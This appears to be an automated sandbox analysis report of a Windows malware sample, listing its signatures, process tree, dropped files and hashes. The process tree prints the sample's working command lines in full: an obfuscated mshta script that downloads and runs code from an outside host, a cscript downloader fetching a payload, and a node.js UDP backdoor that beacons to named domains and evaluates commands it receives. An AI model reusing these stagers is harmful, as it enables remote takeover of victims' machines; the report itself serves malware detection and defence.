Analysis
-
max time kernel
149s -
max time network
181s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
11-07-2021 14:17
Static task
static1
Behavioral task
behavioral1
Sample
usfive_20210711-154344.exe
Resource
win7v20210410
General
-
Target
usfive_20210711-154344.exe
-
Size
3KB
-
MD5
15467567c301ef6ae8b98d4fafb6db67
-
SHA1
9884574ad77b49580ab14047342b4580324cb6ee
-
SHA256
9db5c02ac4e161369160fe13719a212e55377dd57ffc9f98b7141bce3b9df26c
-
SHA512
5b3d68e59a908312a8e009d2b6ec4af06be67ee7a762d996ed914de9c00bf5edd57dd38f8eaac52bff5ff8a42e7760b7503b517c671bffc37bb55327b37382b1
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.execscript.exeflow pid process 2 1992 mshta.exe 5 1536 cscript.exe -
Executes dropped EXE 1 IoCs
Processes:
node.exepid process 396 node.exe -
Loads dropped DLL 1 IoCs
Processes:
cscript.exepid process 516 cscript.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Drops file in Windows directory 2 IoCs
Processes:
expand.exedescription ioc process File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exenetstat.exepid process 564 ipconfig.exe 1028 netstat.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
NTFS ADS 2 IoCs
Processes:
node.exedescription ioc process File created C:\Users\Admin\AppData\Local\Temp\58ed5ac6d082af38:ads node.exe File created C:\ProgramData\DNTException\node.exe:9192f1584e4fd0248a3a2d7b299fc459 node.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 2 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 5 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
node.exepid process 396 node.exe 396 node.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes:
tasklist.exewmic.exenetstat.exedescription pid process Token: SeDebugPrivilege 972 tasklist.exe Token: SeIncreaseQuotaPrivilege 864 wmic.exe Token: SeSecurityPrivilege 864 wmic.exe Token: SeTakeOwnershipPrivilege 864 wmic.exe Token: SeLoadDriverPrivilege 864 wmic.exe Token: SeSystemProfilePrivilege 864 wmic.exe Token: SeSystemtimePrivilege 864 wmic.exe Token: SeProfSingleProcessPrivilege 864 wmic.exe Token: SeIncBasePriorityPrivilege 864 wmic.exe Token: SeCreatePagefilePrivilege 864 wmic.exe Token: SeBackupPrivilege 864 wmic.exe Token: SeRestorePrivilege 864 wmic.exe Token: SeShutdownPrivilege 864 wmic.exe Token: SeDebugPrivilege 864 wmic.exe Token: SeSystemEnvironmentPrivilege 864 wmic.exe Token: SeRemoteShutdownPrivilege 864 wmic.exe Token: SeUndockPrivilege 864 wmic.exe Token: SeManageVolumePrivilege 864 wmic.exe Token: 33 864 wmic.exe Token: 34 864 wmic.exe Token: 35 864 wmic.exe Token: SeIncreaseQuotaPrivilege 864 wmic.exe Token: SeSecurityPrivilege 864 wmic.exe Token: SeTakeOwnershipPrivilege 864 wmic.exe Token: SeLoadDriverPrivilege 864 wmic.exe Token: SeSystemProfilePrivilege 864 wmic.exe Token: SeSystemtimePrivilege 864 wmic.exe Token: SeProfSingleProcessPrivilege 864 wmic.exe Token: SeIncBasePriorityPrivilege 864 wmic.exe Token: SeCreatePagefilePrivilege 864 wmic.exe Token: SeBackupPrivilege 864 wmic.exe Token: SeRestorePrivilege 864 wmic.exe Token: SeShutdownPrivilege 864 wmic.exe Token: SeDebugPrivilege 864 wmic.exe Token: SeSystemEnvironmentPrivilege 864 wmic.exe Token: SeRemoteShutdownPrivilege 864 wmic.exe Token: SeUndockPrivilege 864 wmic.exe Token: SeManageVolumePrivilege 864 wmic.exe Token: 33 864 wmic.exe Token: 34 864 wmic.exe Token: 35 864 wmic.exe Token: SeDebugPrivilege 1028 netstat.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
usfive_20210711-154344.exemshta.execmd.execscript.exenode.exedescription pid process target process PID 1092 wrote to memory of 1992 1092 usfive_20210711-154344.exe mshta.exe PID 1092 wrote to memory of 1992 1092 usfive_20210711-154344.exe mshta.exe PID 1092 wrote to memory of 1992 1092 usfive_20210711-154344.exe mshta.exe PID 1092 wrote to memory of 1992 1092 usfive_20210711-154344.exe mshta.exe PID 1992 wrote to memory of 1500 1992 mshta.exe cmd.exe PID 1992 wrote to memory of 1500 1992 mshta.exe cmd.exe PID 1992 wrote to memory of 1500 1992 mshta.exe cmd.exe PID 1992 wrote to memory of 1500 1992 mshta.exe cmd.exe PID 1500 wrote to memory of 1536 1500 cmd.exe cscript.exe PID 1500 wrote to memory of 1536 1500 cmd.exe cscript.exe PID 1500 wrote to memory of 1536 1500 cmd.exe cscript.exe PID 1500 wrote to memory of 1536 1500 cmd.exe cscript.exe PID 1500 wrote to memory of 1468 1500 cmd.exe expand.exe PID 1500 wrote to memory of 1468 1500 cmd.exe expand.exe PID 1500 wrote to memory of 1468 1500 cmd.exe expand.exe PID 1500 wrote to memory of 1468 1500 cmd.exe expand.exe PID 1500 wrote to memory of 516 1500 cmd.exe cscript.exe PID 1500 wrote to memory of 516 1500 cmd.exe cscript.exe PID 1500 wrote to memory of 516 1500 cmd.exe cscript.exe PID 1500 wrote to memory of 516 1500 cmd.exe cscript.exe PID 516 wrote to memory of 396 516 cscript.exe node.exe PID 516 wrote to memory of 396 516 cscript.exe node.exe PID 516 wrote to memory of 396 516 cscript.exe node.exe PID 516 wrote to memory of 396 516 cscript.exe node.exe PID 396 wrote to memory of 880 396 node.exe cmd.exe PID 396 wrote to memory of 880 396 node.exe cmd.exe PID 396 wrote to memory of 880 396 node.exe cmd.exe PID 396 wrote to memory of 880 396 node.exe cmd.exe PID 396 wrote to memory of 1592 396 node.exe cacls.exe PID 396 wrote to memory of 1592 396 node.exe cacls.exe PID 396 wrote to memory of 1592 396 node.exe cacls.exe PID 396 wrote to memory of 1592 396 node.exe cacls.exe PID 396 wrote to memory of 924 396 node.exe icacls.exe PID 396 wrote to memory of 924 396 node.exe icacls.exe PID 396 wrote to memory of 924 396 node.exe icacls.exe PID 396 wrote to memory of 924 396 node.exe icacls.exe PID 396 wrote to memory of 1916 396 node.exe attrib.exe PID 396 wrote to memory of 1916 396 node.exe attrib.exe PID 396 wrote to memory of 1916 396 node.exe attrib.exe PID 396 wrote to memory of 1916 396 node.exe attrib.exe PID 396 wrote to memory of 1768 396 node.exe attrib.exe PID 396 wrote to memory of 1768 396 node.exe attrib.exe PID 396 wrote to memory of 1768 396 node.exe attrib.exe PID 396 wrote to memory of 1768 396 node.exe attrib.exe PID 396 wrote to memory of 972 396 node.exe tasklist.exe PID 396 wrote to memory of 972 396 node.exe tasklist.exe PID 396 wrote to memory of 972 396 node.exe tasklist.exe PID 396 wrote to memory of 972 396 node.exe tasklist.exe PID 396 wrote to memory of 864 396 node.exe wmic.exe PID 396 wrote to memory of 864 396 node.exe wmic.exe PID 396 wrote to memory of 864 396 node.exe wmic.exe PID 396 wrote to memory of 864 396 node.exe wmic.exe PID 396 wrote to memory of 564 396 node.exe ipconfig.exe PID 396 wrote to memory of 564 396 node.exe ipconfig.exe PID 396 wrote to memory of 564 396 node.exe ipconfig.exe PID 396 wrote to memory of 564 396 node.exe ipconfig.exe PID 396 wrote to memory of 592 396 node.exe route.exe PID 396 wrote to memory of 592 396 node.exe route.exe PID 396 wrote to memory of 592 396 node.exe route.exe PID 396 wrote to memory of 592 396 node.exe route.exe PID 396 wrote to memory of 1028 396 node.exe netstat.exe PID 396 wrote to memory of 1028 396 node.exe netstat.exe PID 396 wrote to memory of 1028 396 node.exe netstat.exe PID 396 wrote to memory of 1028 396 node.exe netstat.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 1916 attrib.exe 1768 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\usfive_20210711-154344.exe"C:\Users\Admin\AppData\Local\Temp\usfive_20210711-154344.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta "javascript:document.write();184;y=unescape('%325%31%7E%68t%74p%3A%2F%2Fl%751%2Ea%73i%61%2F%68r%69%2F%3F2%31a%36e%34b%7E3%34').split('~');29;try{x='WinHttp';55;x=new ActiveXObject(x+'.'+x+'Request.5.1');187;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);165;x.send();220;y='ipt.S';191;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);204;}catch(e){};30;;window.close();"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1626014142501.txt & cscript /nologo /e:jscript get1626014142501.txt "http%3A%2F%2Fasu02.shop%2Fhri%2F%3F2fee0e72c%26b%3Dfa1d848c" node.cab & expand node.cab node.exe & del get1626014142501.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1626014142501.txt & cscript /nologo /e:jscript get1626014142501.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27fee0e72c%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1626014142501.txt3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1626014142501.txt "http%3A%2F%2Fasu02.shop%2Fhri%2F%3F2fee0e72c%26b%3Dfa1d848c" node.cab4⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\expand.exeexpand node.cab node.exe4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1626014142501.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27fee0e72c%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\DNTException\node.exe"C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27fee0e72c%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))5⤵
- Executes dropped EXE
- Checks processor information in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c dir C:\6⤵
-
C:\Windows\SysWOW64\cacls.execacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F6⤵
-
C:\Windows\SysWOW64\icacls.exeicacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)6⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException6⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException\node.exe6⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\tasklist.exetasklist /fo csv /nh6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic process get processid,parentprocessid,name,executablepath /format:csv6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\ipconfig.exeipconfig.exe /all6⤵
- Gathers network information
-
C:\Windows\SysWOW64\route.exeroute.exe print6⤵
-
C:\Windows\SysWOW64\netstat.exenetstat.exe -ano6⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo.exe /fo csv6⤵
- Gathers system information
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\DNTException\get1626014142501.txtMD5
52ec5ebd8a447b5115ce83e703bcde51
SHA138ce97f87c6be668d07985558fc89c53e27770a3
SHA256ef1be6a77e480e683331052654d3db47a02fe4b7af3e35e67b9248e989307615
SHA5129af71d426564ef92ff6de1d89107161c138bbdd9dc08b5e380a0b94e7b2e91ec4d498a1d8f4514552a45bf14a8f9078dc295aa1cb86cfc063427ad218e9d5f32
-
C:\ProgramData\DNTException\get1626014142501.txtMD5
e15f82747d0884d61a5bc4fb2db7d29d
SHA1aca478622586f17603fe56705fd319b75198b2b0
SHA256982675d0465497986b3ece89f08f81a4629d975617671153e0ca653f2589966f
SHA512d8c17e54cbefa72191c238f23d619a4637fd74c8c8b9975071bf5507c5a34259495cd20e516c7f7f0c215ec4f724b22de88b8a5ea43765c019eb067600cf661d
-
C:\ProgramData\DNTException\node.cabMD5
c7ed3d9304a29c8b472174bd910be071
SHA122b7d55b80acd434c13b0a2d8c59b45c10220a42
SHA256abbaffb1b56bd3c5db5aedf4bdc0794d82bedba43677d13cd1056cb5412b3441
SHA512c65c80564019ae54145a939f9ed463895c337f020cbd769647dc6baf8db5db283a5e151c2ae4f10681d23db161d791ce59c395d8ebba603a27a2a6be0368a1a2
-
C:\ProgramData\DNTException\node.exeMD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f
-
C:\ProgramData\DNTException\node.exeMD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f
-
\ProgramData\DNTException\node.exeMD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f
-
memory/396-74-0x0000000014100000-0x0000000014101000-memory.dmpFilesize
4KB
-
memory/396-75-0x0000000034000000-0x0000000034001000-memory.dmpFilesize
4KB
-
memory/396-76-0x0000000035C00000-0x0000000035C01000-memory.dmpFilesize
4KB
-
memory/396-77-0x000000000E300000-0x000000000E301000-memory.dmpFilesize
4KB
-
memory/396-78-0x000000001D000000-0x000000001D001000-memory.dmpFilesize
4KB
-
memory/396-73-0x0000000024700000-0x0000000024701000-memory.dmpFilesize
4KB
-
memory/396-71-0x0000000000000000-mapping.dmp
-
memory/516-66-0x0000000000000000-mapping.dmp
-
memory/564-86-0x0000000000000000-mapping.dmp
-
memory/592-88-0x0000000000000000-mapping.dmp
-
memory/864-85-0x0000000000000000-mapping.dmp
-
memory/880-79-0x0000000000000000-mapping.dmp
-
memory/924-81-0x0000000000000000-mapping.dmp
-
memory/972-84-0x0000000000000000-mapping.dmp
-
memory/1028-89-0x0000000000000000-mapping.dmp
-
memory/1468-64-0x0000000000000000-mapping.dmp
-
memory/1500-60-0x0000000000000000-mapping.dmp
-
memory/1536-61-0x0000000000000000-mapping.dmp
-
memory/1536-63-0x0000000075A31000-0x0000000075A33000-memory.dmpFilesize
8KB
-
memory/1592-80-0x0000000000000000-mapping.dmp
-
memory/1660-90-0x0000000000000000-mapping.dmp
-
memory/1768-83-0x0000000000000000-mapping.dmp
-
memory/1916-82-0x0000000000000000-mapping.dmp
-
memory/1992-59-0x0000000000000000-mapping.dmp